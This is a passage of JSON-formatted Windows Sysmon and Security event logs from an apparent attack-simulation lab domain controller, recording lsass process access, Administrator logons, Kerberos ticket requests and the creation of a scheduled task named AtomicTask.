{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.838\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00108A780800}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.838","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00108A780800}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.838\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00108A780800}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.838","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00108A780800}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:55:19.963\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\Tasks\\AtomicTask\r\nCreationUtcTime: 2020-08-01 06:55:19.963","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:55:19.963","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\Tasks\\AtomicTask","CreationUtcTime":"2020-08-01 06:55:19.963","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220603,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8105C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8105c","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220604,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x826AF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x826af","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220605,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x83183\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x83183","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220606,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220607,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220608,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220609,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88067\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88067","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220610,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88067\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x88067","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 